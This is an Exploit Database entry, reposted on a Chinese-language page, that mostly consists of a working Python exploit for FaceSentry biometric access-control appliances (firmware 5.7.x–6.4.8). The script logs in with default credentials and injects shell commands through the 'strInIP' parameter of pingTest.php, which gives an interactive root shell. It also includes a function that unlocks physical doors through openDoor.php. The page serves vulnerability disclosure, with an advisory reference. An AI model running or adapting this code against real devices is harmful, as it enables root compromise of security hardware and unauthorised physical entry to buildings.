FaceSentry Access Control System 6.4.8 – Remote Root Exploit

• Exploit Database
• 120 阅读

• 作者： LiquidWorm
  日期： 2019-07-01
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/47066/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217

  #!/usr/bin/env python # -*- coding: utf-8 -*- # # # FaceSentry Access Control System 6.4.8 Remote Root Exploit # # # Vendor: iWT Ltd. # Product web page: http://www.iwt.com.hk # Affected version: Firmware 6.4.8 build 264 (Algorithm A16) # Firmware 5.7.2 build 568 (Algorithm A14) # Firmware 5.7.0 build 539 (Algorithm A14) # # Summary: FaceSentry 5AN is a revolutionary smart identity # management appliance that offers entry via biometric face # identification, contactless smart card, staff ID, or QR-code. # The QR-code upgrade allows you to share an eKey with guests # while you&apos;re away from your Office and monitor all activity # via the web administration tool. Powered by standard PoE # (Power over Ethernet), FaceSEntry 5AN can be installed in # minutes with only 6 screws. FaceSentry 5AN is a true enterprise # grade access control or time-and-attendance appliance. # # Desc: FaceSentry suffers from an authenticated OS command # injection vulnerability using default credentials. This can # be exploited to inject and execute arbitrary shell commands # as the root user via the &apos;strInIP&apos; POST parameter in pingTest # PHP script. # # ============================================================== # /pingTest.php: # -------------- # 8:if (!isAuth(&apos;TestTools&apos;,&apos;R&apos;)){ # 9:echo "No Permission"; # 10: include("footer.php"); # 11: exit; # 12:} # 13: # 14: if(isset($_POST["strInIP"])){ # 15: $strInIP = $_POST["strInIP"]; # 16: }else{ # 17: $strInIP = ""; # 18: } # 19: # 20: $strOperationResult = ""; # 21: if ($strInIP != ""){ # 22: # 23:$out = array(); # 24:exec("sudo ping -c 4 $strInIP",$out); # 25:$result = ""; # 26:foreach($out as $line){ # 27:$result = $result.$line."<br>"; # 28:} # ============================================================== # # Tested on: Linux 4.14.18-sunxi (armv7l) Ubuntu 16.04.4 LTS (Xenial Xerus) #Linux 3.4.113-sun8i (armv7l) #PHP/7.0.30-0ubuntu0.16.04.1 #PHP/7.0.22-0ubuntu0.16.04.1 #lighttpd/1.4.35 #Armbian 5.38 #Sunxi Linux (sun8i generation) #Orange Pi PC + # # # Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic # @zeroscience # # # Advisory ID: ZSL-2019-5525 # Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5525.php # # # 28.05.2019 #   import datetime########INITIALIZE import urllib2#########BIOMETRICS import urllib##########FACIAL.REC import time############OGNITION.S import sys##(.)###(.)##YSTEM.DOOR import re#######O######UNLOCKED.A import os#######_######CCESS.GRAN import io######(_)#####TED.0B1000 import py##############1.11111011   from cookielib import CookieJar   global pajton pajton = os.path.basename(sys.argv[0])   def usage(): if len(sys.argv) < 2: print &apos;[+] Usage: ./&apos; + pajton + &apos; <ip>\n&apos; sys.exit()   def auth(): brojac = 0 usernames = [ &apos;admin&apos;, &apos;user&apos;, &apos;administrator&apos; ] # case sensitive passwords = [ &apos;123&apos;, &apos;123&apos;, &apos;123456&apos; ] while brojac < 3: podatoci = { &apos;strInLogin&apos;: usernames[brojac], &apos;strInPassword&apos; : passwords[brojac], &apos;saveLogin&apos; : &apos;1&apos;, &apos;saveFor&apos; : &apos;168&apos; } # 7 days print &apos;[+] Trying creds &apos; + usernames[brojac] + &apos;:&apos; + passwords[brojac] nesto_encode = urllib.urlencode(podatoci) ajde.open(&apos;http://&apos; + target + &apos;/login.php&apos;, nesto_encode) check = ajde.open(&apos;http://&apos; + target + &apos;/sentryInfo.php&apos;) dool = re.search(r&apos;Hardware Key&apos;, check.read()) if dool: print &apos;[+] That worked!&apos; break else: brojac += 1 if brojac == 3: print &apos;[!] Ah ah ah. You didn\&apos;t say the magic word!&apos; sys.exit()   def door(): unlock = raw_input(&apos;[*] Unlock door No.: &apos;) # default door number = 0 try: br = int(unlock) panel = { &apos;strInAction&apos; : &apos;openDoor&apos;, &apos;strInPanelNo&apos;: br, &apos;strInRestartAction&apos;: &apos;&apos;, &apos;strPanelIDRestart&apos; : &apos;&apos;, &apos;strPanelRestartAction&apos; : &apos;&apos; } nesto_encode = urllib.urlencode(panel) ajde.open(&apos;http://&apos; + target + &apos;/openDoor.php&apos;, nesto_encode) print &apos;[+] Door &apos; + unlock + &apos; is unlocked!&apos; except ValueError: print &apos;[!] Only values from 0 to 8 are valid.&apos; door()   def main(): if os.name == &apos;posix&apos;: os.system(&apos;clear&apos;) if os.name == &apos;nt&apos;: os.system(&apos;cls&apos;)   vremetodeneska = datetime.datetime.now() kd = vremetodeneska.strftime(&apos;%d.%m.%Y %H:%M:%S&apos;) print &apos;Starting exploit at &apos; + kd   print &apos;&apos;&apos; ────────────────────────────────── ──FaceSentry Access Control System ────────Remote Root Exploit ─────────Zero Science Lab ────────www.zeroscience.mk ───────────ZSL-2019-5525 ─────────────▄▄▄▄▄▄▄▄▄ ─────────────▌▐░▀░▀░▀▐ ─────────────▌░▌░░░░░▐ ─────────────▌░░░░░░░▐ ─────────────▄▄▄▄▄▄▄▄▄ ───────▄▀▀▀▀▀▌▄█▄░▄█▄▐▀▀▀▀▀▄ ──────█▒▒▒▒▒▐░░░░▄░░░░▌▒▒▒▒▒█ ─────▐▒▒▒▒▒▒▒▌░░░░░░░▐▒▒▒▒▒▒▒▌ ─────▐▒▒▒▒▒▒▒█░▀▀▀▀▀░█▒▒▒▒▒▒▒▌ ─────▐▒▒▒▒▒▒▒▒█▄▄▄▄▄█▒▒▒▒▒▒▒▒▌ ─────▐▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▌ ─────▐▒▒▒▒▒█▒▒▒▒▒▒▒▒▒▒▒█▒▒▒▒▒▌ ─────▐▒▒▒▒▒▐▒▒▒▒▒▒▒▒▒▒▒▌▒▒▒▒▒▌ ─────▐▒▒▒▒▒▒▌▒▒▒▒▒▒▒▒▒▐▒▒▒▒▒▒▌ ─────▐▒▒▒▒▒▒▌▄▄▄▄▄▄▄▄▄▐▒▒▒▒▒▒▌ ─────▐▄▄▄▄▄▄▌▌███████▌▐▄▄▄▄▄▄▌ ──────█▀▀▀▀█─▌███▌███▌─█▀▀▀▀█ ──────▐░░░░▌─▌███▌███▌─▐░░░░▌ ───────▀▀▀▀──▌███▌███▌──▀▀▀▀ ─────────────▌███▌███▌ ─────────────▌███▌███▌ ───────────▐▀▀▀██▌█▀▀▀▌ ▒▒▒▒▒▒▒▒▒▒▒▐▄▄▄▄▄▄▄▄▄▄▌▒▒▒▒▒▒▒▒▒▒▒ &apos;&apos;&apos;   usage() tegla = CookieJar() global ajde, target target = sys.argv[1] ajde = urllib2.build_opener(urllib2.HTTPCookieProcessor(tegla)) auth() raw_input(&apos;\n[*] Press [ENTER] to land... &apos;)   print &apos;[+] Entering interactive (web)shell...&apos; time.sleep(1) print   while True: try: cmd = raw_input(&apos;root@facesentry:~# &apos;) if &apos;exit&apos; in cmd.strip(): print &apos;[+] Take care now, bye bye then!&apos; break if &apos;door&apos; in cmd.strip(): door() continue podatoci = { &apos;strInIP&apos; : &apos;;sudo &apos; + cmd } # |cmd nesto_encode = urllib.urlencode(podatoci) r_izraz = ajde.open(&apos;http://&apos; + target + &apos;/pingTest.php?&apos;, nesto_encode) pattern = re.search(cmd+&apos;\)<[^>]*>(.*?)</font>&apos;, r_izraz.read()) x = pattern.groups()[0].strip() y = x.replace(&apos;<br>&apos;, &apos;\n&apos;) print y.strip() except Exception as i: print &apos;[-] Error: &apos; + i.message pass except KeyboardInterrupt as k: print &apos;\n[+] Interrupter!&apos; sys.exit()   sys.exit()   if __name__ == "__main__": main()